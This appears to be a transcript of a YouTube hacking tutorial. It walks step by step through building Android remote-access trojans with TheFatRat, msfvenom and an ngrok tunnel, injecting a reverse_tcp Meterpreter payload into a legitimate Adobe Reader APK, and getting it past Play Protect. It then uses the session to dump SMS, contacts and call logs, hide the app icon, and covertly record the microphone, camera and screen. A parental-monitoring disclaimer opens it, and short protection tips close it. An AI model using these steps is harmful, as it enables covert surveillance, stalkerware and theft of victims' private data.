The following is for educational purposes only. Cell phone monitoring can only be done legally by a parent to monitor their child's phone.
What if I told you that right now someone could be watching everything you do in your Android phone? This includes your messages, photos, passwords, social media, even listening through your microphone and watching you through your camera. And the scariest part, you never even know they were there. Hey guys, welcome back to Total Tech. In today's video, we're diving deep into one of the most dangerous threats to Android security, remote access exploitation. For those of you guys who have been with me for a while, you may have noticed I've done a video similar to this in the past. However, this time we're going one step beyond that. In today's video, not only will I be showing you how someone can connect directly to another device without the user's permission, but also advanced techniques for injecting malicious code into trusted apps. So if you guys enjoyed this video and want to learn more about cybersecurity and ethical hacking, make sure you like, subscribe, and hit that notification bell so you don't miss out on any future content. And as always, if you have any questions or need any help, please leave me a message in the comments below and I will get back to you. Now, let's understand why Android devices are such attractive targets for attackers. There are over 3 billion active Android device users worldwide. Each one is a powerful computer that contains its user's entire digital life. Banking apps, social media, emails, photos, passwords, everything that matters is stored on those devices. But what really makes Android particularly vulnerable is its open nature. See, unlike other mobile operating systems, Android allows installation from unknown sources. And while this flexibility is great for users, it also creates a lot of opportunities for attackers. Think about this. How many times have you installed an app from outside the Google Play Store? Perhaps there was a game not available in your region, or an app someone shared with you. Each time you do this, you're allowing that app access to your entire digital life. Attackers love to exploit this vulnerability. They create seemingly harmless apps, games, utilities, and security tools. However, hidden deep inside these apps are codes that secretly create a backdoor to your device. And once installed, these malicious apps can access your camera, read your messages, track your location, or even access your banking information. And the most dangerous part, these apps can hide themselves on your phone without leaving an icon, silently running in the background while harvesting your personal information. But don't worry, by the end of this video, I'll show you exactly how these attacks work so you can better protect yourself. Now, let's move over to our lab environment to see these attacks in action. So now that we understand the basics, let's prepare our attack environment. There are two tools that we will need, TheFatRat and ngrok. Let's start with TheFatRat. First, let's update our system. Open your terminal and type sudo apt update. This command refreshes our package list from the repositories, ensuring that we have access to the latest versions of all tools. After that, run sudo apt upgrade. This command installs the latest updates, keeping our system secure and compatible with new tools. Now for the TheFatRat installation. Open your browser and search for the TheFatRat GitHub. Click the first result from the SecSec repository. This is the official repository which ensures we're getting the legitimate tool. Copy the repository link from either the address bar or by clicking the code button. Back in our terminal, let's clone this repository. Type git clone and paste the URL that we just copied. While this clones, let me explain what makes the TheFatRat so special. The TheFatRat is an exploitation framework that automates the creation of backdoors and payloads. What sets it apart is its ability to create sophisticated payloads that can evade antivirus detection, making it both an extremely powerful and dangerous tool in the right hands. Once cloning is complete, navigate into the repository with cd TheFatRat and run ls to see the contents. Notice that setup.sh file? That's our installer, but first we need to make it executable. Run chmod plus x setup.sh. This command gives the file execution permissions. We'll need root privileges for installation, so run sudo su and enter your Kali Linux password. Now run /setup.sh to start the installation. Watch how it checks for all necessary modules. If you see a prompt about an incorrect version of Metasploit, type yes to install the correct version. The installation process is thorough. It's checking for every required tool and marking them with either a check for installed or a cross for missing. Don't worry about the missing ones, it will install them automatically. Just sit back and let it work. When prompted about the backdoor factory, choose option 2 for automatic installation. Next, it will ask for a folder path to save your generated payloads. While you could use the default path, let's make it more accessible. Open a new terminal in your Documents folder. Run pwd to get the complete path, copy it, and paste it back in the TheFatRat terminal. When asked if you want to run the TheFatRat from anywhere using the TheFatRat command, type Y and press enter. This makes the tool easily accessible from any directory. To verify our installation, make sure you're still in root privileges and type TheFatRat. Watch as it performs one final module check. Press enter when prompted and wait while it starts the PostgreSQL service. Then press enter again at the next prompt. And there we have it, the TheFatRat's main menu with all of its options. We'll explore these in detail, but first let's install our second crucial tool, ngrok. Before we move forward, let's understand exactly what ngrok is and why we need it. Ngrok is a powerful tunneling tool that creates secure tunnels to your local host, which makes it accessible from the internet. For our demonstration, we'll use it to create a connection back to our system. Let's install ngrok. Open your browser and search for ngrok Linux. Click the first result that says download ngrok. On the download page, you should see Linux selected as your operating system. They provide a simple installation command. Copy it exactly as shown and paste it in your terminal. Once ngrok is installed, let's verify it. Type ngrok help into your terminal. This shows all available commands. Scroll down and you'll see some sample commands. Let's try the basic one, ngrok http 80. Notice the error? Ngrok is telling us we need to do two things. First, we need to sign up for an account, and second, we need to configure our auth token. See those links in the error message? Let's handle them one by one. Hold Control and click the first link. This opens the ngrok sign-up page in your browser. Once you create your account, go back to the terminal and click the second link to get your auth token. To configure ngrok with your auth token, run ngrok config add auth token followed by your token. This links ngrok to your account. Let's test our setup. Run ngrok http 80 again. See how it starts up without any errors now? But there's still one more crucial step. For our demonstration, we'll be using TCP instead of HTTP. Try running ngrok TCP 4444. You'll notice a different error. Ngrok requires payment verification for TCP tunnels. Click the provided link. Similar to the sign-up process, you'll need to enter some information for verification, but don't worry. ngrok won't charge you anything as we're using the free account. ngrok simply requires this verification because TCP tunnels can potentially be misused for hacking. After completing the verification, try ngrok TCP 4444 again. And now it works perfectly. Our environment setup is now complete. Both ngrok and the TheFatRat are now ready for our demonstration. Now we're at the main menu of the TheFatRat. Look at all these powerful options before us. We're interested in the first option, create backdoor with MSF Venom. Type 1 and press enter. This brings us to a new menu with multiple options for different operating systems, programming languages, and frameworks. You can create payloads for Windows, Linux, PHP, and more, but today we're focusing on Android. Look at option 3, sign Android TheFatRat APK. Type 3 and press enter. Open the ngrok TCP terminal. Look at that address it generated. We need to copy everything after TCP up to the colon. This is what we'll use instead of a local IP address. Copy it, switch back to the TheFatRat, and paste it as our L host. Next is asking for L port. Again, for local testing, you'll typically use port 4444. This is the default port that Metasploit typically uses for many of its operations, but since we're using ngrok, we need to use the port it provided. Copy that number from your ngrok terminal and paste it here. Now we want a name for our output file. You can name it anything you want. I'm calling mine myrat. Think of this name carefully because in real-world security testing, it should blend in with normal apps. Look at these payload options. We're using TCP, so we want option 3, Android/meterpreter/reverse_TCP. This payload creates a persistent connection back to our machine through TCP, which gives us powerful control capabilities over the device. Now it's asking if we want to create a resource file for the MSF Venom listener. For now, enter N for no. We'll handle our listener setup manually to better understand the process. Press enter again to return to the main menu. Let's verify our payload was created. Remember when we set up the TheFatRat, we configured it to save files in Documents. Open that folder, and there it is, Our myrat.apk is waiting to be deployed. Now comes the critical part, getting this payload onto our target device. In a real-world security assessment, this would involve social engineering, but since we're in a testing environment, we have options. We could use a USB cable, but let me show you a smarter method. Let me show you how to do this completely remotely through a self-made Python server. Right-click in Documents folder and open Terminal here. We'll run a simple yet powerful command, python3 mhttp.server90. Let me explain what this does. Python has a built-in HTTP server module. The M flag tells Python to run this module, and we're specifying port 90. This creates a basic web server that shares all files in our current directory. Now switch to your testing device. This could either be an Android emulator or a physical device you connected to remotely. Open this browser and enter your Kali Linux machine's IP address, followed by 90. See how it shows our directory contents? And there's our myrat.apk waiting to be downloaded. Click on the APK. Notice that warning? File can't be downloaded securely. It's showing two options, discard or keep. This is Android's first line of defense against unknown applications. Click keep. After downloading, try to install it. Look at that prominent warning, Google Play Protect unsafe app blocked. This is Google's security system doing its job, detecting potentially harmful applications. Click on more details and then install anyway. Once installed, don't open it yet. Click done. We need to set up our listener first. Exit the Python server with Control+C. We don't need it anymore. Back at the TheFatRat terminal, let's return to the main menu. Type 15 and press enter. Look at option 10, jump to MSF console. Type 10 and press enter. A new terminal window opens launching the Metasploit framework. This is where the real power comes in. Wait for it to fully load. You'll see the MSF6 prompt. Type clear and press enter. Now we need to set up our handler with useExploit/multi/handler. This module is crucial. It's what catches and manages our incoming connection. Think of it as setting up a specialized receiver for our payload. We need to configure the exact same payload we use in our APK. Type set payload Android/media/reverse_TCP. To verify our connections, type show options. See how L port is already set to 4444, but look, lhost is empty. We need to set it. Type set lhost 0.0.0.0. This tells Metasploit to listen to all network interfaces. This is important with working with external connections like we are. Now comes the moment of truth. Switch to your Android device and open the app. It's asking for permissions. Click continue. We want to grant these for our testing. You may see another warning about the app being built for an older version of Android. Click OK to dismiss it. Back to our MSF console terminal. Type run, and there it is. Session established successfully. We now have full control of the Android device. Type help to see the full arsenal at our disposal. Look at all those commands. Let's test some of the most powerful ones. Type sysinfo. Look at what happens. It displays comprehensive system information about the target device. You can see the Android version, architect details, everything an attacker would need to tailor their next move. Type webcam_list. This shows all available cameras on the device, front, back, side, and any other cameras the device has access to. Try dump_call log. This command extracts the entire call history. Look into the TheFatRat folder. See how it saves everything there? This folder becomes a treasury of extracted information. Let's grab more data. Type dump_contacts. This pulls the entire contact list. Next, type dump_SMS to download all text messages. Want to know where the device is? Type geolocate. This gives the device's current location. Here's something particularly stealthy. Type hide_app_icon. Watch what happens on the device. The app icon disappears from the app drawer. The application keeps running, but the user can't see it anymore. This is why malicious apps are so dangerous. They can hide their presence while maintaining full access. In our previous section, I showed you how to generate a standalone malicious app, and through that app, how you can hack into any Android phone. But you may have noticed that app did not look like a normal one. The name of that app was Main Activity, which does not seem legitimate at all. So in this section, which will be the advanced part of that demonstration, we will discuss how to make a real app into a malicious one. Let's begin with opening the terminal and gaining root privileges by typing sudo su and then entering your Kali Linux password. After that, run the command TheFatRat. Press enter and continue when prompted. Now we're at the main menu of the TheFatRat. Here in the previous section, we selected the first option, which is create backdoor with MSF Venom, but this time we will not use that option. Instead, we'll use the fifth option, which is backdooring original APK. To use this option, type 5 and press enter. Now you can see it's asking to set the L host. In the previous section, we used ngrok to work on the internet, but in this section, we'll go into a more detailed explanation. Copy the L host provided above and paste it here. Now it's asking for the L port. Type 4444 here and press enter. The reason that we're using this is because it's the most commonly available port and not typically blocked by firewalls, making it ideal for establishing our connection. Here's the main part. It's asking to provide the path for a legitimate app in which we want to inject our payload. Now you may be asking yourself, where can we find that app? It's actually not that hard. TheFatRat provides some testing apps for which we can use for testing purposes. Here we need to copy the path of the app in which we want to inject our payload. To do this, open the Kali home folder and go to the TheFatRat directory. Here you can see a folder for APKs. Open it. Here we have two more folders. Open the first folder, and here you can see two apps that are available for testing purposes. The first is Adobe Reader, and the second is WhatsApp. We will use Adobe Reader for our demonstration. However, in a real-world setting, we can make this injection look like anything we want, including a normal update for the phone. To copy the path, you can either right-click and copy the path from Properties, or you can first click the app, press F2 for the app name, copy it, and then paste it in front of the folder address. Now copy the complete address. After it's copied, go back to the TheFatRat terminal and paste it here. Then press enter. Now you can see that the TheFatRat is testing the app to see if it's suitable for payload injection. When the test is complete, you can see it shows different types of payloads that we can remotely inject into our app. We will use a reverse TCP to establish a connection back to our machine when the victim opens the app. To use it, type 3 and click enter. Now it's showing 3 more options that are actually different methods for injecting the payload. The first is use backdoor APK 0.2.4a, which is a specialized tool for backdooring Android applications that preserve the original app's functionality. The second is use old TheFatRat method, which is a legacy approach that might work better on older versions of Androids. The third is use MSF Venom embedded method, which directly embeds our payload into the Metasploit framework's tools. We will use the third one. Type 3 and press enter. Now the process has started, but here you can see an error occurred stating that APK tool 2.6.0 is installed. However, we need at least version 2.9.2, so let's set up our environment accordingly. If you don't face this error, you can skip this process. To download the correct version of APK tool, open your browser and search for APK tool. Here you can see the first official link, and below that, there's the install guide mentioned. Click the link and you will be redirected to the install guide page. Scroll down to the Linux section and click to download the latest version of APK tool. Here you can see the different versions. We need at least version 2.9.2. Click it to download. After some time, it will be downloaded. Open the downloads folder and you can see it's here. Now open the home/Kali and the TheFatRat folder. In this, you can see the tools folder. Open it, and inside of it, you can find the APK tool folder. Open it. Here you can see that there are 3 files that are present. First is the APK tool wrapper. We don't need to do anything with it. Second is the old version of APK tool. We need to replace it with the latest version. To do this, first we need to delete it. Next, copy the download file and paste it here. Now click F2 to change the name and make it into what we need it to be. Remove the version part from the file and it will become apktool.jar. Now we have to change the version file. Open it and you can see 2.6.0 is written. Change it to 2.9.2. Save it and close it. Now open a new terminal and type the command apktool --version. And you can see that the updated version is here. Now here we need to install another tool, which is APK Signer. This tool is used to sign file apps after modification, which is necessary for Android to recognize and install them. To install it, type the command sudo apt install APK Signer. Enter your Kali Linux password and type Y to continue the install. Now that everything is done, we will move back to the TheFatRat process again. Now we're at the point where we previously faced the error. You can see the backdooring process has started. This will take some time. During the process, the TheFatRat is decompiling the legitimate app, injecting malicious code into it, and then recompiling everything while preserving the original app's functionality. This approach is more complex than creating a standalone malicious app because it needs to ensure the original app still works normally while our backdoor keeps running silently in the background. When the process completes, we'll return to the main menu. Next, let's open the folder where the TheFatRat saved the app file. In our previous section, we set the save location to the Documents folder, so let's check there. Open the Documents folder and you'll see a file named app_backdoor.apk. This is our malicious app. Now we need to transfer it to our target device. Let's repeat the same process we did in the previous section. Open a new terminal in the Documents folder and run the command python3 mhttp.server90. Now open the browser on your testing device and enter the IP address of your Kali machine with port 90. You can see the backdoor app is available here. Click it to download it. Open the downloads and tap the file to install it. Click the install button. Once the installation completes, click Done. We'll open the app after setting up the MSF Venom listener. Now that our malicious app is installed on the target device, we need to set up our listener to receive the connection when the app is open. Let's open up a new Kali Linux terminal and gain root privileges. Type MSF console to launch the Metasploit framework. This might take a moment to load. Once Metasploit loads, we need to configure our handler. Type use exploit/multi/handler and press enter. This module handles the incoming connections from our payload. Next, we need to set our payload to match what we use in the TheFatRat. Type set payload android/meterpreter/reverse_TCP and press enter. Let's check what options we need to configure. Type options and press enter. You'll see that the L host isn't set yet, but the L port is already set to 4444, the same port that we specified earlier. To set L host, type set L host followed by your Kali Linux machine's IP address. Now comes the exciting part. Type run and press enter. This starts our handler, which we will wait for the target device to connect. Switch your Android device and open the Adobe Reader app that we modified. Watch your Metasploit console closely. Within moments, you should see a message indicating that the MeterPreter session has been established. This means that we have now established a connection to our target device. What makes this attack particularly dangerous is that the Adobe Reader app still appears to function normally to the user. They can still use it to read PDF files while our backdoor runs silently in the background. Let's explore what we can do with this connection. First, at the MeterPreter prompt, type sysinfo and press enter. This command gives us detailed information about the compromised device, including its Android version, hardware details, and architecture. This is crucial information that attackers will use to determine which exploits might work against a target device. Next, let's try one of the most invasive capabilities, audio recording. Type record_mic D10 and press enter. This records 10 seconds of audio through the device's microphone and saves it to your attacking machine. The victim would have absolutely no indication that their conversations were being recorded. This could also be used to capture sensitive discussions, personal conversations, or even passwords spoken aloud. Now let's check what cameras are available on the device. Type webcam_list and press enter. You'll see a list of available cameras on the device. Typically both front and back cameras are listed. Each camera has an index number assigned to it. Let's take a photo using the front-facing camera without the victim knowing. Type webcam_snap I2 and press enter. The number after I specifies which camera to use. In this case, camera index 2, which is typically the front-facing camera. This captures a photo using the selected camera and saves it to your attacking machine. Think about the privacy implications of this. An attacker could secretly take photos of the victim or their surroundings. They can even capture what's on the screen. Type screenshot and press enter. This takes a screenshot of whatever is currently being displayed on the victim's device and saves it to your machine. This can be used to capture sensitive information like banking details, private messages, or passwords. For continuous monitoring, we can use screen share, which gives us a live feed of the victim's screen. Type screen share and press enter. Now we can see everything they're doing on their device in real time. We can also explore the complete file system of the device using basic Linux commands. You can access photos, documents, downloads, and other sensitive files stored on the victim's device. Now let me be clear. All these capabilities I just showed you are why mobile security is so crucial. The fact that we disguise our malicious code inside of what appears to be a legitimate app is what makes this attack vector so dangerous. Most users would not think twice about installing something that looks like a normal update for their phone, especially if it came from what appears to be a legitimate source like their cell phone provider. Now that you understand how devastating these attacks can be, let's talk about protecting yourself and your devices. This isn't just theory, these are practical steps that can save your digital life. First, and most crucial, never install apps from unknown sources. I know it's tempting when you find an app that's not on the Play Store, but this is one of the easiest ways attackers gain access to your device. You know that unknown sources toggle in your security settings? Think of it as the front door to your digital house. Keep it locked. Google Play Protect isn't just an annoying pop-up, it's your first line of defense. When you saw those warnings during our demonstration, that was Play Protect doing its job. Never bypass these warnings on your personal device. The few seconds it takes to find a legitimate app on the Play Store could save you from months of privacy nightmares. Keep your Android system updated because every security patch matters. Attackers often exploit known vulnerabilities that have already been patched in newer versions. Here's something many people overlook. Make sure you check your installed apps regularly. Go to Settings, then Apps. Look for anything you don't remember installing. Pay special attention to apps with weird names or symbols you don't recognize. If something looks suspicious, remove it immediately. Watch your app permissions carefully. An app asking for permissions it shouldn't need is a massive red flag. Why would a calculator need access to your camera? Why does a game need to read your SMS messages? These unnecessary permissions are often how malicious apps maintain their control over your device. Use a reliable mobile security solution. The built-in Play Protect is good, but additional security can provide extra layers of protection. Look for solutions that offer real-time scanning and app behavior monitoring. For tech-savvy users, consider using an app like Network Monitor Mini. It shows all active network connections on your device. If you see suspicious outbound connections, especially to unknown addresses, investigate immediately. Monitor your battery usage. Malicious apps often drain battery by running constantly in the background. If your battery life suddenly decreases or your phone feels hot when you're not using it, check your battery usage statistics for suspicious activity. Lastly, here's a pro tip. Use Android's built-in safe mode when you suspect something's wrong with your phone. Reboot your device while holding the power button and you'll see an option for safe mode. This prevents third-party apps from running, making it easier to identify and remove malicious apps. Remember, the knowledge shared in this video carries great responsibility. Use it to protect yourself and others, never for malicious purposes. Understanding these attacks is crucial for defense. However, implementing them without proper authorization is both dangerous and unethical. If you found this information useful, make sure to like, subscribe, and hit that notification bell so you don't miss out on any future content. And again, if you have any questions, please leave me a message in the comments below. Thanks for stopping by, and I will see you in the next video.